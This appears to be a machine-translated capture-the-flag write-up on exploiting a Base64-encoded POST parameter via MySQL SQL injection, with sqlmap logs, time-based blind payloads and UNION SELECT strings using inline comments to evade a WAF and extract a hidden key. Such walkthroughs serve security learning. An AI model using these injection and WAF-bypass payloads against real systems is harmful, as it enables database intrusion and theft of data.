"Mysql SQL Inject" POST method BASE64 encoding injection write-up

Turn to the small partners in the group issued a post-type SQL injection problem, simple grab packet to determine the problem requires Base64 code to execute the SQL statement, for Learning SQL injection question and the idea of the breakthrough + work is not very busy, so spend a bit of time to play, ha ha ha haha haha

http://104.224.169.128/tasks/web12.php

1 <scriptlanguage = "javascript"> function onSearch ()
2 {
3 var pwd = document.forms [0] .inText.value;
4 $ .base64.utf8encode = true;
5 document.forms [0] .inputText.value = $. Base64.encode (pwd);
6 document.forms [0] .submit ();
7 </ script>
 

** Thinking process: **
First grab the package and test it in sqlmap. Here we can use firefox hackbar. It is obvious that the content submitted by a hidden field in the form is base64 encoded. Most of these questions are for the participants to manually test before doing so. At first I thought that this should not be difficult. Sqlmap, just grab the package and add the -tamper base64encode extension module. Later, I found that I can only read the library name, add -V 5 to get a detailed playload, or use blind sleep time judgment. ; What the hell? ;

0x01 SQLMAP:
First test: column library name

inText = 1111 & inputText = JyBBTkQgNTY3MD1JRigoT1JEKE1JRCgoSUZOVUxMKENBU1QoREFUQUJBU0
UoKSBBUyBDSEFSKSwweDIwKSksMTIsMSkpPjEpLFNMRUVQKDUpLDU2NzApIEFORCAnRkt6SScgTElLRS
AnRkt6SQ% 3D% 3D


[18:39:54] [TRAFFIC IN] HTTP response [# 4613] (200 OK):
Content-length: 1215
Content-language: en-US
Uri: http://104.224.169.128:80/tasks/web12.php
Server: Apache / 2.2.15 (CentOS) DAV / 2
Connection: close
Date: Tue, 19Apr201610: 39: 53 GMT
Content-type: text / html
[18:39:55] [INFO] retrieved: injecttest2
[18:39:55] [DEBUG] performed 95 queries in694.98 seconds
current database: ‘injecttest2’
[18:39:55] [INFO] fetched data logged to text files under ‘C: \ Users \ Administrato
r \ .sqlmap \ output \ 104.224.169.128 ‘
 

Second test: cannot find table name

 

Full echo package obtained after adding -V

sqlmap resumed the following injection point (s) from stored session:
---
Parameter: # 1 * ((custom) POST)
Type: AND / OR time-based blind
Title: MySQL> = 5.0.12 AND time-based blind
Payload: inText = 11111111 & inputText = ‘AND SLEEP (5) AND‘ uYGj ’LIKE‘ uYGj
Vector: AND [RANDNUM] = IF (([INFERENCE]), SLEEP ([SLEEPTIME]), [RANDNUM])
---
web server operating system: LinuxCentOS6.5
web application technology: Apache2.2.15
back-end DBMS: MySQL5.0.12
available databases [1]:
[*] injecttest2
sqlmap resumed the following injection point (s) from stored session:
---
Parameter: # 1 * ((custom) POST)
Type: AND / OR time-based blind
Title: MySQL> = 5.0.12 AND time-based blind
Payload: inText = 11111111 & inputText = ‘AND SLEEP (5) AND‘ uYGj ’LIKE‘ uYGj
Vector: AND [RANDNUM] = IF (([INFERENCE]), SLEEP ([SLEEPTIME]), [RANDNUM])
---
web server operating system: LinuxCentOS6.5
web application technology: Apache2.2.15
back-end DBMS: MySQL5.0.12
No tables found
sqlmap resumed the following injection point (s) from stored session:
---
Parameter: # 1 * ((custom) POST)
Type: AND / OR time-based blind
Title: MySQL> = 5.0.12 AND time-based blind
Payload: inText = 11111111 & inputText = ‘AND SLEEP (5) AND‘ uYGj ’LIKE‘ uYGj
---
web server operating system: LinuxCentOS6.5
web application technology: Apache2.2.15
back-end DBMS: MySQL5.0.12
No tables found
 

Extract the Playload of SQLMAP

1 'AND 5670 = IF ((ORD (MID ((IFNULL (CAST (DATABASE () AS CHAR), 0x20)), 12,1))> 1), SLEEP (5), 5670) AND' FKzI 'LIKE' FKzI
0x02 manual test
It's amazing to manually close the single quotes of the SQL statement and inject it. Hum hum;
(1) Local test
Explored the playload of SQLMAP and checked the usage of if (), ord (), mid (), IFNULL (), CAST () and other functions;
Simplify the sqlmap with the sleep () function, and change it to the form of judging whether it is right or wrong. Compare the page content length returned by AND 5670 = 5670 to determine whether there is an injection. Blindly guess the database name.

 1 mysql> select * from the_flag_table where the_flag_content like '%' AND 5670 = IF ((ORD (MID ((IFNULL (CAST (DATABASE () AS CHAR), 0x20)), 1,1))> 116), 5671, 5670);
 2 + ---------------------- + ----------------- +
 3 | the_flag_content | the_value123456 |
 4 + ---------------------- + ----------------- +
 5 | flags {Hello, Iamflags | 1 |
 6 | flags2 (hello, test) | 2 |
 7 + ---------------------- + ----------------- +
 8 2 rows inset (0.00 sec)
 9 mysql> select * from the_flag_table where the_flag_content like '%' AND 5670 = IF ((ORD (MID ((IFNULL (CAST (DATABASE () AS CHAR), 0x20)), 1,1))> 116), 5670, 5671);
10 Emptyset (0.00 sec)
 

Detect database name length;

1 select * from the_flag_table where the_flag_content like ‘%’ union select (LENGTH ((IFNULL (CAST (DATABASE () AS CHAR), 0x20)))> 11), 222--
 

Use the MID () function to check whether each ASCII code is correct;

‘AND 5670 = IF ((ORD (MID ((IFNULL (CAST (DATABASE () AS CHAR), 0x20)), N, 1))> 105), 5670,5671)-
**come to conclusion:**
Library: injecttest2
User: [email protected]
(2) Ran eggs:
When I tested the IF function injection and it was in full swing, suddenly the young people in the group reminded the IF function injection that this situation can only query DATABASE (), USER (), and VERSION (). The table can't be without ...
At this moment my heart is broken. . .

0x03 Bypass keyword test:
Had to go back to the old way, collect related articles bypassed by mysql injection, determine what was detected, and determine the idea;
(1) A keyword in the SQL statement is filtered, such as union, select, etc .;
(2) Special symbols are filtered such as spaces, single quotes, equal signs, etc .;
(3) filtering a certain string of characters;
Test keywords, symbols, and other conditions did not trigger the detection strategy, and the detection strategy was triggered when "’ union select 1– "was entered;

Randomly find related articles to test one by one, and follow the bypass IDS / WAF method test mentioned in the following two articles. It is found that the way of inline comments can be bypassed. The injection point is already base64 encoding, so the encoding in the article can be abandoned:
"In-depth understanding of SQL injection bypass waf and filtering mechanism"
http://drops.wooyun.org/tips/968
Avoiding Keywords
http://websec.ca/kb/sql_injection

Inline annotation playload
The following is my process Playload using inline annotations;
Field description
Relevant library name: injecttest2
After encoding the library name: 696e6a6563747465737432
Related table names: article, __key___in__this
"__Key___in__this" After encoding the table name: 0x5f5f6b65795f5f5f696e5f5f74686973
Related fields: keystr
Content Acquisition: Key: d8b3bc4ecd8791fb

‘Order by3--
** Library name **
‘/ *! Union * / / *! Select * / version (), 2,3--
‘/ *! Union * / / *! Select * / (/ *! Select * / schema_name from information_schema.schemata limit 1,1), 2,3--
**Table Name**
‘/ *! Union * / / *! Select * / (/ *! Select * / table_name from information_schema.tables where table_schema = 0x696e6a6563747465737432 / *! * / Limit 1,1), 2,3--
** field name **
‘/ *! Union * / / *! Select * / (/ *! Select * / column_name from information_schema.columns where table_name = 0x5f5f6b65795f5f5f696e5f5f74686973 limit 0,1), 2,3--
** flag get **
‘/ *! Union * / / *! Select * / (/ *! Select * / keystr from __key___in__this limit 0,1), 2,3--
 

Aggressive
Someone also used another when testing This annotation method is bypassed, and the process is complemented. Below are three example diagrams;

‘Order by3--
‘Union select / *! * / 1,2,3--
** Library name **
‘Union select / *! * / (Select / *! * / Schema_name from information_schema.schemata limit 0,1), 2,3--
‘Union select / *! * / (Select / *! * / Schema_name / *! * / From information_schema.schemata / *! * / Limit 1,1), 2,3--
**Table Name**
‘Union select / *! * / (Select / *! * / Table_name / *! * / From information_schema.tables where table_schema = 0x696e6a6563747465737432 / *! * / Limit 1,1), 2,3--
** field name **
‘Union select / *! * / (Select / *! * / Column_name / *! * / From information_schema.columns where table_name = 0x5f5f6b65795f5f5f696e5f5f74686973 / *! * / Limit 0,1), 2,3--
** flag get **
‘Union select / *! * / (Select / *! * / Keystr / *! * / From __key ___ in__this / *! * / Limit 0,1), 2,3--
 

Playload

inText = 1 & inputText =% JyB1bmlvbiBzZWxlY3QvKiEqLyhzZWxlY3QvKiEqL3NjaGVtYV9uYW1lLyohKi9mcm9tLyohKi9p1W1L2W2
Related examples:
[Weifeng official APP has SQL injection (SQLMAP full POST Base64 encoding example)]
http://www.wooyun.org/bugs/wooyun-2010-0177954

 




[Mysql sql inject] POST method BASE64 encoding injection write-up